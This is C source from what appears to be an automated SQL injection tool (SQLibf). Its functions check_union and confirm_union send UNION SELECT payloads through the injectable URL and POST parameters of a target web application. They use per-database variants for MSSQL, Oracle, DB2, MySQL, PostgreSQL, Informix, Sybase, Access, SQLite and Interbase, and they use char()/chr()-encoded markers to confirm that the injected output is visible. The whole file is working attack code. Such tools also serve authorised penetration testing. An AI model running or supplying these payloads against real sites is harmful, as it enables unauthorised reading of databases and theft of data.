/*
 * <union.c>
 */


#include "sqlibf.h"


//
// CHECK_UNION ______________________________________________________________________
//
// Uso: Intenta conseguir un UNION correcto
//

int check_union(struct cracked_url cu) {
  struct assembled_url au;
  struct result resultado;
  struct query_string *ptr_param;
  int counter=1;
  int comparacion=0;
  char append[STRING_SIZE];
  int campos=0;
  int original=0;


  IMPRIME("[ 7.0 ] Doing UNION Tests\n");

  ptr_param=cu.url_params;

  while(counter<=cu.param_num) {
    if(ptr_param->siguiente==0) ptr_param=cu.post_params;
    if(ptr_param->is_injectable && ptr_param->terminator) {

      base_error.body_words=ptr_param->error_words;
      base_error.body_lines=ptr_param->error_lines;
      if(ptr_param->is_dinamic==DINAMIC_KEY) strncpy(key_word, ptr_param->my_keyword, WORD_SIZE-1);
      if(ptr_param->is_dinamic==DINAMIC_LW && options.test_type==KEY_WORD) { options.test_type=LINES; original=KEY_WORD; }

      IMPRIME("[ 7.%d.0 ] Checking possible UNIONs at Parameter: '%s'\n", counter, variable_name(cu, counter));

      // SQL Server

      if(cu.db_version == MSSQL) {

        IMPRIME("[ 7.%d.1 ] Using Microsoft SQL Server Patterns\n", counter);

        campos=0;

        strncpy(append, " UNION ALL SELECT NULL", STRING_SIZE-1);

        au=assemble_url(cu, counter, append);

        while(campos<UNION_MAX) {

          campos++;

          resultado=get_url(au);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_error.body_words)-4;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_error.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion>0) {
            IMPRIME("\n==> FOUND Valid UNION With (%d) Columns\n\n** URL:\n%s\n", campos, au.url);
            if(do_post) IMPRIME("\n** POST:\n%s\n", au.post);
            campos=confirm_union(campos, cu, counter, append);
            return campos;
            } else {
            free(au.url); free(au.post);
            strcat(append, ",NULL");
            au=assemble_url(cu, counter, append);
            IMPRIME("."); fflush(stdout);
            }

          }

        }


      // ORACLE

      if(cu.db_version == ORACLE) {

        IMPRIME("[ 7.%d.2 ] Using Oracle Patterns\n", counter);

        campos=0;

        strncpy(append, " UNION SELECT NULL FROM DUAL", STRING_SIZE-1);

        au=assemble_url(cu, counter, append);

        while(campos<UNION_MAX) {

          campos++;

          resultado=get_url(au);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_error.body_words)-5;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_error.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion>0) {
            IMPRIME("\n==> FOUND Valid UNION With (%d) Columns\n\n** URL:\n%s\n", campos, au.url);
            if(do_post) IMPRIME("\n** POST:\n%s\n", au.post);
            campos=confirm_union(campos, cu, counter, append);
            return campos;
            } else {
            free(au.url); free(au.post);
            append[strlen(append)-10]='\0';
            strcat(append, ",NULL FROM DUAL");
            au=assemble_url(cu, counter, append);
            IMPRIME("."); fflush(stdout);
            }

          }

        }


      // DB2

      if(cu.db_version == DB2) {
        // DB2 Stuff
        int numero, i, l;
        int elements=2;
        int c[20]={0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
        char d[2][WORD_SIZE]={"'2005-01-28-16.09.04.00'","1"};

        IMPRIME("[ 7.%d.3 ] Using DB2 Patterns:\n", counter);

        // EXPERIMENTAL: based on UNION where 67=89
        if(ptr_param->is_dinamic==DINAMIC_KEY) options.test_type=KEY_WORD;

        for(numero=1;numero<=10;numero++) { // Numero maximo de combinaciones

          IMPRIME("%d", numero); fflush(stdout);

          for(i=1;i<=pow(elements,numero);i++) {

            strncpy(append, " UNION ALL SELECT ", STRING_SIZE-1);

            for(l=0;l<numero;l++) {
              if(c[l]>elements-1) { c[l]=0; c[l+1]++; }
              strcat(append, d[c[l]]);
              if(l<numero-1) { strcat(append, ","); }
              }

            c[0]++;

            strcat(append, " FROM sysibm.systables WHERE 67=89");
            IMPRIME("."); fflush(stdout);

            au=assemble_url(cu, counter, append);

            resultado=get_url(au);

            if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-8;
            if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
            if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

            // EXPERIMENTAL: based on UNION where 67=89

            if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
              //IMPRIME("Confirming...\n");
              //db_from_error=0;
              //resultado=get_url(au);
              //if(db_from_error==DB2) {
              //IMPRIME("==> SECOND ERROR (Not Valid) / Continuing...\n");
              //  } else {
              IMPRIME("\n==> FOUND Valid UNION With (%d) Columns\n\n** URL:\n%s\n", numero, au.url);
              if(do_post) IMPRIME("\n** POST:\n%s\n", au.post);
              campos=numero;
              campos=confirm_union(campos, cu, counter, append);
              return campos;
              //  }
              }

            // Repasar que el confirm_union es bueno

            free(au.url); free(au.post);

            }

          }

        }


      // MySQL

      if(cu.db_version == MYSQL4) {

        IMPRIME("[ 7.%d.4 ] Using MySQL Patterns\n", counter);

        campos=0;

        strncpy(append, " UNION SELECT NULL", STRING_SIZE-1);

        au=assemble_url(cu, counter, append);

        while(campos<UNION_MAX) {

          campos++;

          resultado=get_url(au);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_error.body_words)-3;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_error.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion>0) {
            IMPRIME("\n==> FOUND Valid UNION With (%d) Columns\n\n** URL:\n%s\n", campos, au.url);
            if(do_post) IMPRIME("\n** POST:\n%s\n", au.post);
            campos=confirm_union(campos, cu, counter, append);
            return campos;
            } else {
            strcat(append, ",NULL");
            au=assemble_url(cu, counter, append);
            IMPRIME("."); fflush(stdout);
            }

          }

        }
		// free(au.url); 
		// free(au.post);

      


      // PostgreSQL

      if(cu.db_version == POSTGRESQL) {

        IMPRIME("[ 7.%d.5 ] Using PostgreSQL Patterns\n", counter);

        campos=0;

        strncpy(append, " UNION SELECT NULL", STRING_SIZE-1);

        au=assemble_url(cu, counter, append);

        while(campos<UNION_MAX) {

          campos++;

          resultado=get_url(au);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_error.body_words)-3;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_error.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion>0) {
            IMPRIME("\n==> FOUND Valid UNION With (%d) Columns\n\n** URL:\n%s\n", campos, au.url);
            if(do_post) IMPRIME("\n** POST:\n%s\n", au.post);
            campos=confirm_union(campos, cu, counter, append);
            return campos;
            } else {
            free(au.url); free(au.post);
            strcat(append, ",NULL");
            au=assemble_url(cu, counter, append);
            IMPRIME("."); fflush(stdout);
            }

          }

        }


      // Informix

      if(cu.db_version == INFORMIX) {
        // DB2 Stuff -> not tested
        int numero, i, l;
        int elements=2;
        int c[20]={0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
        char d[2][WORD_SIZE]={"'2005-01-28-16.09.04.00'","1"};

        IMPRIME("[ 7.%d.3 ] Using Informix Patterns:\n", counter);

        // EXPERIMENTAL: based on UNION where 67=89
        if(ptr_param->is_dinamic==DINAMIC_KEY) options.test_type=KEY_WORD;

        for(numero=1;numero<=10;numero++) { // Numero maximo de combinaciones

          IMPRIME("%d", numero); fflush(stdout);

          for(i=1;i<=pow(elements,numero);i++) {

            strncpy(append, " UNION ALL SELECT ", STRING_SIZE-1);

            for(l=0;l<numero;l++) {
              if(c[l]>elements-1) { c[l]=0; c[l+1]++; }
              strcat(append, d[c[l]]);
              if(l<numero-1) { strcat(append, ","); }
              }

            c[0]++;

            strcat(append, " FROM sysusers WHERE 67=89");
            IMPRIME("."); fflush(stdout);

            au=assemble_url(cu, counter, append);

            resultado=get_url(au);

            if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-8;
            if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
            if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

            // EXPERIMENTAL: based on UNION where 67=89

            if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
              //IMPRIME("Confirming...\n");
              //db_from_error=0;
              //resultado=get_url(au);
              //if(db_from_error==DB2) {
              //IMPRIME("==> SECOND ERROR (Not Valid) / Continuing...\n");
              //  } else {
              IMPRIME("\n==> FOUND Valid UNION With (%d) Columns\n\n** URL:\n%s\n", numero, au.url);
              if(do_post) IMPRIME("\n** POST:\n%s\n", au.post);
              campos=numero;
              campos=confirm_union(campos, cu, counter, append);
              return campos;
              //  }
              }

            // Repasar que el confirm_union es bueno

            free(au.url); free(au.post);

            }

          }

        }


      // Sybase

      if(cu.db_version == SYBASE) {

        IMPRIME("[ 7.%d.7 ] Using Sybase Patterns\n", counter);

        campos=0;

        strncpy(append, " UNION ALL SELECT NULL", STRING_SIZE-1);

        au=assemble_url(cu, counter, append);

        while(campos<UNION_MAX) {

          campos++;

          resultado=get_url(au);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_error.body_words)-4;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_error.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion>0) {
            IMPRIME("\n==> FOUND Valid UNION With (%d) Columns\n\n** URL:\n%s\n", campos, au.url);
            if(do_post) IMPRIME("\n** POST:\n%s\n", au.post);
            campos=confirm_union(campos, cu, counter, append);
            return campos;
            } else {
            free(au.url); free(au.post);
            strcat(append, ",NULL");
            au=assemble_url(cu, counter, append);
            IMPRIME("."); fflush(stdout);
            }

          }

        }


      // MS Access

      if(cu.db_version == ACCESS) {

        IMPRIME("[ 7.%d.8 ] Using Microsoft Access Patterns\n", counter);

        campos=0;

        strncpy(append, " UNION ALL SELECT NULL FROM MSysAccessObjects", STRING_SIZE-1);

        au=assemble_url(cu, counter, append);

        while(campos<UNION_MAX) {

          campos++;

          resultado=get_url(au);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_error.body_words)-8;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_error.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion>0) {
            IMPRIME("\n==> FOUND Valid UNION With (%d) Columns\n\n** URL:\n%s\n", campos, au.url);
            if(do_post) IMPRIME("\n** POST:\n%s\n", au.post);
            campos=confirm_union(campos, cu, counter, append);
            return campos;
            } else {
            free(au.url); free(au.post);
            append[strlen(append)-23]='\0';
            strcat(append, ",NULL FROM MSysAccessObjects");
            au=assemble_url(cu, counter, append);
            IMPRIME("."); fflush(stdout);
            }

          }

        }


      // Pointbase


      // SQLite

      if(cu.db_version == SQLITE) {

        IMPRIME("[ 7.%d.9 ] Using SQLite Patterns\n", counter);

        campos=0;

        strncpy(append, " UNION SELECT NULL", STRING_SIZE-1);

        au=assemble_url(cu, counter, append);

        while(campos<UNION_MAX) {

          campos++;

          resultado=get_url(au);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_error.body_words)-3;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_error.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion>0) {
            IMPRIME("\n==> FOUND Valid UNION With (%d) Columns\n\n** URL:\n%s\n", campos, au.url);
            if(do_post) IMPRIME("\n** POST:\n%s\n", au.post);
            campos=confirm_union(campos, cu, counter, append);
            return campos;
            } else {
            free(au.url); free(au.post);
            strcat(append, ",NULL");
            au=assemble_url(cu, counter, append);
            IMPRIME("."); fflush(stdout);
            }

          }

        }


      // Interbase/Firebird

      if(cu.db_version == INTERBASE) {

        IMPRIME("[ 7.%d.8 ] Using Interbase/Firebird Patterns\n", counter);

        campos=0;

        strncpy(append, " UNION ALL SELECT NULL FROM RDB$DATABASE", STRING_SIZE-1);

        au=assemble_url(cu, counter, append);

        while(campos<UNION_MAX) {

          campos++;

          resultado=get_url(au);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_error.body_words)-8;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_error.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion>0) {
            IMPRIME("\n==> FOUND Valid UNION With (%d) Columns\n\n** URL:\n%s\n", campos, au.url);
            if(do_post) IMPRIME("\n** POST:\n%s\n", au.post);
            campos=confirm_union(campos, cu, counter, append);
            return campos;
            } else {
            free(au.url); free(au.post);
            append[strlen(append)-18]='\0';
            strcat(append, ",NULL FROM RDB$DATABASE");
            au=assemble_url(cu, counter, append);
            IMPRIME("."); fflush(stdout);
            }

          }

        }


      // FIN DDBBs

      IMPRIME("\n");
      if(original) options.test_type=KEY_WORD;

    }

    ptr_param=ptr_param->siguiente;
    counter++;
  }

  IMPRIME("==> CAN'T FIND a valid UNION\n");

  return 0;

}


//
// CONFIRM_UNION ______________________________________________________________
//
// Uso: Comprueba si el UNION conseguido sirve para mostrar datos
//

int confirm_union(int campos, struct cracked_url cu, int counter, char *append) {
  struct assembled_url au;
  struct assembled_url mod_au;
  char *ptr;
  struct result resultado;
  int i=0;
  int c=0;
  int in_post=0;
  char magic[STRING_SIZE]="NULL";
  // 48 48 83 81 76 105 98 102
  char inject[STRING_SIZE]="'00SQLibfinJectTest21'";
  char inject_mysql[]="char(48,48,83,81,76,105,98,102)";
  char inject_postgres[]="chr(48)||chr(48)||chr(83)||chr(81)||chr(76)||chr(105)||chr(98)||chr(102)";
  char inject_mssql[]="char(48)+char(48)+char(83)+char(81)+char(76)+char(105)+char(98)+char(102)";
  char inject_access[]="chr(48)+chr(48)+chr(83)+chr(81)+chr(76)+chr(105)+chr(98)+chr(102)";


  // Conditional WHERE erase (db2)

  ptr=strstr(append, " WHERE ");

  if(ptr!=0) { /*IMPRIME("WHERE: %d\n", campos);*/ *ptr='\0'; }

  doing_union=1;

  au=assemble_url(cu, counter, append);

  doing_union=0;

  switch(db_from_finger) {
    case DB2:
      strncpy(magic, "'2005-01-28-16.09.04.00'", STRING_SIZE-1);
    case POSTGRESQL:
    case ORACLE:
      strncpy(inject, uri_encode(inject_postgres), STRING_SIZE-1);
      break;
    case MYSQL4:
      strncpy(inject, uri_encode(inject_mysql), STRING_SIZE-1);
      break;
    case MSSQL:
    case SYBASE:
      strncpy(inject, uri_encode(inject_mssql), STRING_SIZE-1);
      break;
    case ACCESS:
      strncpy(inject, uri_encode(inject_access), STRING_SIZE-1);
      break;
    }


  IMPRIME("\n[ 8.0.0 ] Confirming if UNION is Visible\n");


  for(c=1;c<=campos;c++) {

    mod_au.url=malloc(STRING_SIZE); memset(mod_au.url, 0, STRING_SIZE);
    mod_au.post=malloc(STRING_SIZE); memset(mod_au.post, 0, STRING_SIZE);
    strncpy(mod_au.url, au.url, STRING_SIZE-1);
    strncpy(mod_au.post, au.post, STRING_SIZE-1);

    ptr=au.url;
    in_post=0;

    for(i=1;i<=c;i++) {
      if(ptr) ptr=strstr(ptr, magic);
      if(!ptr) { ptr=au.post; ptr=strstr(ptr, magic); in_post=1; }
      if(ptr) ptr+=strlen(magic);
      }

    if(options.debuging>5) IMPRIME("+++++ confirm_union() PTR: %p\n", ptr);

    if(ptr) {
    if(!in_post) {
      strncpy(mod_au.url, au.url, ptr-strlen(magic)-au.url);
      strncpy(mod_au.url+(ptr-strlen(magic)-au.url), inject, strlen(inject));
      strncpy(mod_au.url+(ptr-strlen(magic)-au.url)+strlen(inject), ptr, STRING_SIZE-1);
    } else {
      strncpy(mod_au.post, au.post, ptr-strlen(magic)-au.post);
      strncpy(mod_au.post+(ptr-strlen(magic)-au.post), inject, strlen(inject));
      strncpy(mod_au.post+(ptr-strlen(magic)-au.post)+strlen(inject), ptr, STRING_SIZE-1);
      }
      } else {
      IMPRIME("\nNOT ENOUGH MAGIC: %d (DB2?)\n", c);
      return 0;
      }

    IMPRIME("."); fflush(stdout);

    resultado=get_url(mod_au);

    // Chapuza here ->
    analiza_html=1;

    if(db_from_error==111) {
    IMPRIME("\n==> CONFIRMED Visible UNION\n");
    IMPRIME("\n** URL:\n%s\n", mod_au.url);
    if(do_post) IMPRIME("\n** POST:\n%s\n", mod_au.post);
      return c;
      }
    }

  // Incluir ORDER BY

  return 0;

}


